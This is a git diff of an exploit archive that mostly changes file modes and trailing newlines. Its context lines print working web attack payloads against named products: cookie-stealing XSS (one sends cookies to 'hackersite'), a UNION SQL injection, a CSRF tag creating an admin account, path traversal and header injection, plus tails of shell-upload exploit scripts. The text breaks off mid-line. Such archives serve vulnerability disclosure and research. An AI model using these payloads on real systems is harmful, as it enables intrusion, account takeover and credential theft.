-http://www.example.com/_admin/?SQ_BACKEND_PAGE=main&backend_section=am&am_section=edit_asset"><script>alert(document.cookie)</script>&assetid=73&sq_asset_path=%2C1%2C73&sq_link_path=%2C0%2C74&asset_ei_screen=details [XSS] \ No newline at end of file +http://www.example.com/_admin/?SQ_BACKEND_PAGE=main&backend_section=am&am_section=edit_asset"><script>alert(document.cookie)</script>&assetid=73&sq_asset_path=%2C1%2C73&sq_link_path=%2C0%2C74&asset_ei_screen=details [XSS] \ No newline at end of file diff --git a/platforms/java/webapps/37555.txt b/platforms/java/webapps/37555.txt old mode 100755 new mode 100644 index 3548f7d64..a6917613d --- a/platforms/java/webapps/37555.txt +++ b/platforms/java/webapps/37555.txt @@ -8,4 +8,4 @@ ManageEngine Applications Manager 10.0 is vulnerable; other versions may also be http://www.example.com/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+WHERE+table_schema=database()--%20- -http://www.example.com/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search \ No newline at end of file +http://www.example.com/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search \ No newline at end of file diff --git a/platforms/java/webapps/37557.txt b/platforms/java/webapps/37557.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/37589.txt b/platforms/java/webapps/37589.txt old mode 100755 new mode 100644 index f5b9e67ce..07880aa40 --- a/platforms/java/webapps/37589.txt +++ b/platforms/java/webapps/37589.txt @@ -9,4 +9,4 @@ ConcourseSuite version 6.1 (20120209) is vulnerable; other versions may also be http://www.example.com/crm/Sales.do?nameFirst&nameLast http://www.example.com/crm/ExternalContacts.do?nameFirst&nameLast&company http://www.example.com/crm/Accounts.do?name -http://www.example.com/crm/MyCFSProfile.do?address1state \ No newline at end of file +http://www.example.com/crm/MyCFSProfile.do?address1state \ No newline at end of file diff --git a/platforms/java/webapps/37999.txt b/platforms/java/webapps/37999.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/38130.txt b/platforms/java/webapps/38130.txt old mode 100755 new mode 100644 index 56b7fb155..2754845fa --- a/platforms/java/webapps/38130.txt +++ b/platforms/java/webapps/38130.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain administrat N-central 8.0.1 through 8.2.0-1152 are vulnerable; other versions may also be affected. -<img src="https://ncentral/addAccountActionStep1.do?page=1&pageName=add_account&email=test%40redacted.co.nz&pswd=CSRF123!!!&confirmPassword=CSRF123!!&paperSize=Letter&numberFormat=en_US&statusEnabled=true&type=SO%20Admin&defaultDashboard=All%20Devices&uiSessionTimeOut=20&configRemoteControlEnabled=on&useRemoteControlEnabled=on&rcAvailability=Available&useManagementTaskEnabled=on&firstName=CSRF&lastName=Hacker&phone=&ext=&department=&street1=&street2=&city=&stateProv=&postalCode=&country=&method=Finish"></img> \ No newline at end of file +<img src="https://ncentral/addAccountActionStep1.do?page=1&pageName=add_account&email=test%40redacted.co.nz&pswd=CSRF123!!!&confirmPassword=CSRF123!!&paperSize=Letter&numberFormat=en_US&statusEnabled=true&type=SO%20Admin&defaultDashboard=All%20Devices&uiSessionTimeOut=20&configRemoteControlEnabled=on&useRemoteControlEnabled=on&rcAvailability=Available&useManagementTaskEnabled=on&firstName=CSRF&lastName=Hacker&phone=&ext=&department=&street1=&street2=&city=&stateProv=&postalCode=&country=&method=Finish"></img> \ No newline at end of file diff --git a/platforms/java/webapps/38358.txt b/platforms/java/webapps/38358.txt old mode 100755 new mode 100644 index 980f11025..98ab9f496 --- a/platforms/java/webapps/38358.txt +++ b/platforms/java/webapps/38358.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow HP Intelligent Management Center 5.1 E0202 is vulnerable; other versions may also be affected. -http://www.example.com/imc/topo/topoContent.jsf?opentopo_symbolid="><img src="http://security.inshell.net/img/logo.png" onload=alert('XSS');>&opentopo_loader=null&opentopo_level1nodeid=3 &topoorientation_parentsymbolid=null&topoorientation_devsymbolid=null&topoorientation_level1nodeid=null &topoorientation_loader=null&checknode=null&ywkeys=isvlan&ywvalues=1&uselefttree=null&usetabpane=null&HandleMode=null&toponamelist=null \ No newline at end of file +http://www.example.com/imc/topo/topoContent.jsf?opentopo_symbolid="><img src="http://security.inshell.net/img/logo.png" onload=alert('XSS');>&opentopo_loader=null&opentopo_level1nodeid=3 &topoorientation_parentsymbolid=null&topoorientation_devsymbolid=null&topoorientation_level1nodeid=null &topoorientation_loader=null&checknode=null&ywkeys=isvlan&ywvalues=1&uselefttree=null&usetabpane=null&HandleMode=null&toponamelist=null \ No newline at end of file diff --git a/platforms/java/webapps/38461.txt b/platforms/java/webapps/38461.txt old mode 100755 new mode 100644 index e69212dbc..4f4bb6977 --- a/platforms/java/webapps/38461.txt +++ b/platforms/java/webapps/38461.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Hero 3.791 is vulnerable; other versions may also be affected. -http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/java/webapps/38462.txt b/platforms/java/webapps/38462.txt old mode 100755 new mode 100644 index 375a74aa6..41ba06e49 --- a/platforms/java/webapps/38462.txt +++ b/platforms/java/webapps/38462.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Hero 3.791 is vulnerable; other versions may also be affected. -http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg== \ No newline at end of file +http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg== \ No newline at end of file diff --git a/platforms/java/webapps/38739.txt b/platforms/java/webapps/38739.txt old mode 100755 new mode 100644 index e9b9d6dc8..8af3ada53 --- a/platforms/java/webapps/38739.txt +++ b/platforms/java/webapps/38739.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to obtain sensitive information that may aid SearchBlox 7.4 Build 1 is vulnerable; other versions may also be affected. -http://www.example.com/searchblox/servlet/CollectionListServlet?action=getList&orderBy=colName&direction=asc \ No newline at end of file +http://www.example.com/searchblox/servlet/CollectionListServlet?action=getList&orderBy=colName&direction=asc \ No newline at end of file diff --git a/platforms/java/webapps/39193.txt b/platforms/java/webapps/39193.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/39334.txt b/platforms/java/webapps/39334.txt old mode 100755 new mode 100644 index 72b55127d..73f06c6a7 --- a/platforms/java/webapps/39334.txt +++ b/platforms/java/webapps/39334.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to influence how web content is served, cach Yealink VoIP Phones firmware 28.72.0.2 and hardware 28.2.0.128.0.0.0 are vulnerable; other versions may also be affected. -GET /servlet?linepage=1&model=%0d%0a[Header]&p=dsskey&q=load \ No newline at end of file +GET /servlet?linepage=1&model=%0d%0a[Header]&p=dsskey&q=load \ No newline at end of file diff --git a/platforms/java/webapps/39391.txt b/platforms/java/webapps/39391.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/39418.txt b/platforms/java/webapps/39418.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/39481.txt b/platforms/java/webapps/39481.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/39837.txt b/platforms/java/webapps/39837.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/39886.txt b/platforms/java/webapps/39886.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/39995.txt b/platforms/java/webapps/39995.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/39996.txt b/platforms/java/webapps/39996.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/40161.txt b/platforms/java/webapps/40161.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/40231.txt b/platforms/java/webapps/40231.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/40286.txt b/platforms/java/webapps/40286.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/40437.txt b/platforms/java/webapps/40437.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/40569.txt b/platforms/java/webapps/40569.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/40794.txt b/platforms/java/webapps/40794.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/40817.txt b/platforms/java/webapps/40817.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/40842.txt b/platforms/java/webapps/40842.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/41014.txt b/platforms/java/webapps/41014.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/41082.txt b/platforms/java/webapps/41082.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/42034.txt b/platforms/java/webapps/42034.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/42037.txt b/platforms/java/webapps/42037.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/42543.txt b/platforms/java/webapps/42543.txt old mode 100755 new mode 100644 index d36afa512..0eee23b08 --- a/platforms/java/webapps/42543.txt +++ b/platforms/java/webapps/42543.txt @@ -61,4 +61,4 @@ Host: TARGET GET http://TARGET/touch.txt HTTP/1.1 -peend +peend \ No newline at end of file diff --git a/platforms/java/webapps/42544.py b/platforms/java/webapps/42544.py index e1cc7415f..b80f884f0 100755 --- a/platforms/java/webapps/42544.py +++ b/platforms/java/webapps/42544.py @@ -228,4 +228,4 @@ print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print -sys.exit() +sys.exit() \ No newline at end of file diff --git a/platforms/java/webapps/43114.py b/platforms/java/webapps/43114.py index a96f728da..b1e552ea8 100755 --- a/platforms/java/webapps/43114.py +++ b/platforms/java/webapps/43114.py @@ -371,4 +371,4 @@ try: except RuntimeError as e: o('-', e) finally: - x.service_undeploy() + x.service_undeploy() \ No newline at end of file diff --git a/platforms/json/webapps/39488.txt b/platforms/json/webapps/39488.txt old mode 100755 new mode 100644 diff --git a/platforms/json/webapps/41541.html b/platforms/json/webapps/41541.html old mode 100755 new mode 100644 diff --git a/platforms/json/webapps/42111.txt b/platforms/json/webapps/42111.txt old mode 100755 new mode 100644 diff --git a/platforms/json/webapps/42371.txt b/platforms/json/webapps/42371.txt old mode 100755 new mode 100644 diff --git a/platforms/json/webapps/42372.txt b/platforms/json/webapps/42372.txt old mode 100755 new mode 100644 diff --git a/platforms/json/webapps/42579.txt b/platforms/json/webapps/42579.txt old mode 100755 new mode 100644 index 467950c09..b84d8d5f5 --- a/platforms/json/webapps/42579.txt +++ b/platforms/json/webapps/42579.txt @@ -56,5 +56,4 @@ Content-Type: application/x-xz Content-Disposition: form-data; name="BackupConfig[Upload][Description]" <script>confirm(017)</script> -------WebKitFormBoundary8FfEu2Tn6fUOnT80-- - +------WebKitFormBoundary8FfEu2Tn6fUOnT80-- \ No newline at end of file diff --git a/platforms/json/webapps/42580.html b/platforms/json/webapps/42580.html old mode 100755 new mode 100644 index 1288eb621..5804ed992 --- a/platforms/json/webapps/42580.html +++ b/platforms/json/webapps/42580.html @@ -55,4 +55,4 @@ HTML Decoded PoC: <input type="submit" value="Submit request" /> </form> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/jsp/dos/37218.txt b/platforms/jsp/dos/37218.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/remote/18179.html b/platforms/jsp/remote/18179.html old mode 100755 new mode 100644 diff --git a/platforms/jsp/remote/20412.txt b/platforms/jsp/remote/20412.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/remote/20429.txt b/platforms/jsp/remote/20429.txt old mode 100755 new mode 100644 index ec3f9b4d0..b4b57386f --- a/platforms/jsp/remote/20429.txt +++ b/platforms/jsp/remote/20429.txt @@ -21,4 +21,4 @@ Example: http://target/filename.jsp../ IIS 5 requesting the URL encoded with ASCII: '%2' instead of '.' -Example: http://target/filename%2ejsp \ No newline at end of file +Example: http://target/filename%2ejsp \ No newline at end of file diff --git a/platforms/jsp/remote/20592.txt b/platforms/jsp/remote/20592.txt old mode 100755 new mode 100644 index 5fa0a89de..c93c828ae --- a/platforms/jsp/remote/20592.txt +++ b/platforms/jsp/remote/20592.txt @@ -14,4 +14,4 @@ will copy the contents of the C:\winnt\win.ini file to a file in http://host/_pa http://host/bb.sqljsp//..//..//..//..//..//../winnt/win.ini -will also copy the contents of the c:\winnt\win.ini file to a file in the http://host/_pages directory, and change the extension to .java, with "win" in the name of the file. \ No newline at end of file +will also copy the contents of the c:\winnt\win.ini file to a file in the http://host/_pages directory, and change the extension to .java, with "win" in the name of the file. \ No newline at end of file diff --git a/platforms/jsp/remote/21355.txt b/platforms/jsp/remote/21355.txt old mode 100755 new mode 100644 index 5abd5d91f..46e9ece9b --- a/platforms/jsp/remote/21355.txt +++ b/platforms/jsp/remote/21355.txt @@ -6,4 +6,4 @@ A cross-site scripting vulnerability exists in Citrix NFuse. The launch.asp and This may enable an attacker to steal cookie-based authentication credentials from legitimate users of the vulnerable software. -http://my_nfuse_portal.com/launch.jsp?NFuse_Application=<script>alert(document.cookie);</script> \ No newline at end of file +http://my_nfuse_portal.com/launch.jsp?NFuse_Application=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/jsp/remote/39439.txt b/platforms/jsp/remote/39439.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/remote/42698.rb b/platforms/jsp/remote/42698.rb index 3898fa630..335356790 100755 --- a/platforms/jsp/remote/42698.rb +++ b/platforms/jsp/remote/42698.rb @@ -111,4 +111,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/platforms/jsp/webapps/10013.txt b/platforms/jsp/webapps/10013.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/10059.txt b/platforms/jsp/webapps/10059.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/10061.txt b/platforms/jsp/webapps/10061.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/10085.txt b/platforms/jsp/webapps/10085.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/10094.txt b/platforms/jsp/webapps/10094.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/11324.txt b/platforms/jsp/webapps/11324.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/11393.txt b/platforms/jsp/webapps/11393.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/11793.txt b/platforms/jsp/webapps/11793.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/12242.txt b/platforms/jsp/webapps/12242.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/14369.txt b/platforms/jsp/webapps/14369.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/14617.txt b/platforms/jsp/webapps/14617.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/15290.txt b/platforms/jsp/webapps/15290.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/15596.txt b/platforms/jsp/webapps/15596.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/15918.txt b/platforms/jsp/webapps/15918.txt old mode 100755 new mode 100644 index 46d6d0fbe..d7a5dcb84 --- a/platforms/jsp/webapps/15918.txt +++ b/platforms/jsp/webapps/15918.txt @@ -128,4 +128,4 @@ persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from your computer. Microland takes all reasonable steps to ensure that its electronic communications are free from viruses. However, given Internet accessibility, the Company cannot accept liability for any virus introduced by this e-mail or -any attachment and you are advised to use up-to-date virus checking software. \ No newline at end of file +any attachment and you are advised to use up-to-date virus checking software. \ No newline at end of file diff --git a/platforms/jsp/webapps/15997.py b/platforms/jsp/webapps/15997.py index 74444e503..1c126a021 100755 --- a/platforms/jsp/webapps/15997.py +++ b/platforms/jsp/webapps/15997.py @@ -198,5 +198,4 @@ if __name__ == "__main__": interactiveAttack(myopener) elif options.csrf: writeCsrf() - addadmin = "" - \ No newline at end of file + addadmin = "" \ No newline at end of file diff --git a/platforms/jsp/webapps/17437.txt b/platforms/jsp/webapps/17437.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/17442.txt b/platforms/jsp/webapps/17442.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/17503.pl b/platforms/jsp/webapps/17503.pl index 51dc903b2..6396269b0 100755 --- a/platforms/jsp/webapps/17503.pl +++ b/platforms/jsp/webapps/17503.pl @@ -430,8 +430,4 @@ $ret=$paths[$i]; return $ret; -} - - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/jsp/webapps/17551.txt b/platforms/jsp/webapps/17551.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/17574.php b/platforms/jsp/webapps/17574.php old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/17586.txt b/platforms/jsp/webapps/17586.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/17713.txt b/platforms/jsp/webapps/17713.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/17846.php b/platforms/jsp/webapps/17846.php old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/17897.txt b/platforms/jsp/webapps/17897.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/18260.txt b/platforms/jsp/webapps/18260.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/18373.txt b/platforms/jsp/webapps/18373.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/18416.txt b/platforms/jsp/webapps/18416.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/18626.txt b/platforms/jsp/webapps/18626.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/18888.txt b/platforms/jsp/webapps/18888.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/21052.txt b/platforms/jsp/webapps/21052.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/21545.txt b/platforms/jsp/webapps/21545.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/21621.txt b/platforms/jsp/webapps/21621.txt old mode 100755 new mode 100644 index 1d2eb5b65..e6b2c8a7d --- a/platforms/jsp/webapps/21621.txt +++ b/platforms/jsp/webapps/21621.txt @@ -4,4 +4,4 @@ Macromedia Sitespring is a J2EE-compliant product for managing website productio A cross-site scripting issue has been reported in the default error page used by Sitespring. When an HTTP 500 error is returned, some user-supplied data is included in the generated HTML. Since this data isn't properly sanitized, an attacker may be able to include arbitrary HTML, including JavaScript. -http://server/error/500error.jsp?et=1<script>alert('KPMG')</script> \ No newline at end of file +http://server/error/500error.jsp?et=1<script>alert('KPMG')</script> \ No newline at end of file diff --git a/platforms/jsp/webapps/21875.txt b/platforms/jsp/webapps/21875.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/22040.txt b/platforms/jsp/webapps/22040.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/22805.txt b/platforms/jsp/webapps/22805.txt old mode 100755 new mode 100644 index f41290fa8..132359c48 --- a/platforms/jsp/webapps/22805.txt +++ b/platforms/jsp/webapps/22805.txt @@ -6,4 +6,4 @@ An attacker may exploit this vulnerability by enticing a victim user to follow a It should be noted that although this vulnerability has been reported to affect Tmax Soft JEUS version 3.1.4p1, all version prior to release 3.2.2 are also reported vulnerable. -http://www.example.com/url.jsp?foo=<script>alert('XSS vulnerability exists!')</script> \ No newline at end of file +http://www.example.com/url.jsp?foo=<script>alert('XSS vulnerability exists!')</script> \ No newline at end of file diff --git a/platforms/jsp/webapps/22849.txt b/platforms/jsp/webapps/22849.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/22857.txt b/platforms/jsp/webapps/22857.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/23262.txt b/platforms/jsp/webapps/23262.txt old mode 100755 new mode 100644 index 005b6736d..f00cfbc2d --- a/platforms/jsp/webapps/23262.txt +++ b/platforms/jsp/webapps/23262.txt @@ -10,4 +10,4 @@ Caucho Resin version 2.1 and prior have been reported to be prone to this issue, http://www.example.com:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4 or -<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR \ No newline at end of file +<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR \ No newline at end of file diff --git a/platforms/jsp/webapps/23315.txt b/platforms/jsp/webapps/23315.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/23402.txt b/platforms/jsp/webapps/23402.txt old mode 100755 new mode 100644 index ee7a20a2c..4d3af6739 --- a/platforms/jsp/webapps/23402.txt +++ b/platforms/jsp/webapps/23402.txt @@ -6,4 +6,4 @@ Successful exploitation of this issue could potentially allow an attacker to ste http://www.example.com:8000/server/<your server>/webserver/webserverlist.jsp?action=start&externalWebServer=DefaultDomain%3aservice%3d<script code> -http://www.example.com:8000/clusterframe.jsp?cluster=<script code> \ No newline at end of file +http://www.example.com:8000/clusterframe.jsp?cluster=<script code> \ No newline at end of file diff --git a/platforms/jsp/webapps/23872.txt b/platforms/jsp/webapps/23872.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/24139.txt b/platforms/jsp/webapps/24139.txt old mode 100755 new mode 100644 index 3d6e220ba..9dbd6c894 --- a/platforms/jsp/webapps/24139.txt +++ b/platforms/jsp/webapps/24139.txt @@ -5,4 +5,4 @@ It has been reported that Liferay Enterprise Portal is susceptible to multiple c Test: Add a message with subject <script>history.go(-1)</script> -Now, no user can see message board. \ No newline at end of file +Now, no user can see message board. \ No newline at end of file diff --git a/platforms/jsp/webapps/24158.txt b/platforms/jsp/webapps/24158.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/24449.txt b/platforms/jsp/webapps/24449.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/24773.txt b/platforms/jsp/webapps/24773.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/24786.txt b/platforms/jsp/webapps/24786.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/25159.txt b/platforms/jsp/webapps/25159.txt old mode 100755 new mode 100644 index c2c6f6096..39390a38e --- a/platforms/jsp/webapps/25159.txt +++ b/platforms/jsp/webapps/25159.txt @@ -14,4 +14,4 @@ To access a restricted console resource: http://www.example.com/usermode/consoleConnect.jsp?consolename=console_name To gain escalated privileges: -http://www.example.com/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save \ No newline at end of file +http://www.example.com/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save \ No newline at end of file diff --git a/platforms/jsp/webapps/25198.txt b/platforms/jsp/webapps/25198.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/25269.txt b/platforms/jsp/webapps/25269.txt old mode 100755 new mode 100644 index 3346c6158..37c46d9eb --- a/platforms/jsp/webapps/25269.txt +++ b/platforms/jsp/webapps/25269.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in http://paolo/reports/examples/Tools/test.jsp?repprod&desname='&lt;script&gt;alert(document.cookie);&lt;/script&gt; -http://paolo/reports/examples/Tools/test.jsp?repprod"&lt;script&gt;alert(document.cookie);&lt;/script&gt; \ No newline at end of file +http://paolo/reports/examples/Tools/test.jsp?repprod"&lt;script&gt;alert(document.cookie);&lt;/script&gt; \ No newline at end of file diff --git a/platforms/jsp/webapps/25628.txt b/platforms/jsp/webapps/25628.txt old mode 100755 new mode 100644 index 5fea1e82a..64d643157 --- a/platforms/jsp/webapps/25628.txt +++ b/platforms/jsp/webapps/25628.txt @@ -10,4 +10,4 @@ The bbcode [url] tag is not properly sanitized of user-supplied input. This coul ;window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/url] [url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27 -,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url] \ No newline at end of file +,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url] \ No newline at end of file diff --git a/platforms/jsp/webapps/25685.txt b/platforms/jsp/webapps/25685.txt old mode 100755 new mode 100644 index e5f73d435..fc90b51c6 --- a/platforms/jsp/webapps/25685.txt +++ b/platforms/jsp/webapps/25685.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/13683/info The MimeMessage method in the Sun JavaMail API does not perform sufficient validation on message number values that are passed to the method during requests. An attacker that can successfully authenticate to an email server implementation that is written using the Sun JavaMail API, may exploit this issue to make requests for arbitrary email messages that are stored on the server. http://www.example.com/ReadMessage.jsp?msgno=10001 -http://www.example.com/ReadMessage.jsp?msgno=10002 \ No newline at end of file +http://www.example.com/ReadMessage.jsp?msgno=10002 \ No newline at end of file diff --git a/platforms/jsp/webapps/25738.txt b/platforms/jsp/webapps/25738.txt old mode 100755 new mode 100644 index 4c4463468..1964c7795 --- a/platforms/jsp/webapps/25738.txt +++ b/platforms/jsp/webapps/25738.txt @@ -10,4 +10,4 @@ http://www.example.com:7001/console/login/LoginForm.jsp?j_password=""onBlur="win http://www.example.com:7001/console/login/LoginForm.jsp?j_username=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)" -http://www.example.com:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)" \ No newline at end of file +http://www.example.com:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('http://hackersite/'%2Bdocument.cookie)" \ No newline at end of file diff --git a/platforms/jsp/webapps/25739.txt b/platforms/jsp/webapps/25739.txt old mode 100755 new mode 100644 index 8d1ada14d..8faece2dc --- a/platforms/jsp/webapps/25739.txt +++ b/platforms/jsp/webapps/25739.txt @@ -6,4 +6,4 @@ A successful attack may facilitate the theft of cookie-based authentication cred This issue was originally released as part of BID 13717 (BEA WebLogic Server and WebLogic Express Multiple Remote Vulnerabilities). Due to the availability of more information, this vulnerability is being assigned a new BID. -http://www.example.com:7001/console/a?=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com:7001/console/a?=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/jsp/webapps/25946.txt b/platforms/jsp/webapps/25946.txt old mode 100755 new mode 100644 index 56d2d7322..1bc8fccfc --- a/platforms/jsp/webapps/25946.txt +++ b/platforms/jsp/webapps/25946.txt @@ -13,4 +13,4 @@ https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=fa Example URIs for the authentication bypass vulnerabilities: https://www.example.com:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&selectedDomain=0&fullAccessRight=true -https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1 \ No newline at end of file +https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1 \ No newline at end of file diff --git a/platforms/jsp/webapps/25977.txt b/platforms/jsp/webapps/25977.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/26073.txt b/platforms/jsp/webapps/26073.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/26354.txt b/platforms/jsp/webapps/26354.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/26532.txt b/platforms/jsp/webapps/26532.txt old mode 100755 new mode 100644 index e837b1b0a..04c9144ef --- a/platforms/jsp/webapps/26532.txt +++ b/platforms/jsp/webapps/26532.txt @@ -8,4 +8,4 @@ Other scripts may also be vulnerable. http://www.example.com/revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects -http://www.example.com/revize/debug/query_results.jsp?query=select%20*%20from%20pbpublic.rSubjects \ No newline at end of file +http://www.example.com/revize/debug/query_results.jsp?query=select%20*%20from%20pbpublic.rSubjects \ No newline at end of file diff --git a/platforms/jsp/webapps/26533.txt b/platforms/jsp/webapps/26533.txt old mode 100755 new mode 100644 index ec753cb35..bdfae0ed3 --- a/platforms/jsp/webapps/26533.txt +++ b/platforms/jsp/webapps/26533.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to retrieve sensitive information. In A sample URI has been provided: -http://www.example.com/revize/conf/revise.xml \ No newline at end of file +http://www.example.com/revize/conf/revise.xml \ No newline at end of file diff --git a/platforms/jsp/webapps/26534.txt b/platforms/jsp/webapps/26534.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/26700.txt b/platforms/jsp/webapps/26700.txt old mode 100755 new mode 100644 index 3bd581361..e19c6f30f --- a/platforms/jsp/webapps/26700.txt +++ b/platforms/jsp/webapps/26700.txt @@ -4,4 +4,4 @@ Java Search Engine is prone to a cross-site scripting vulnerability. This issue An 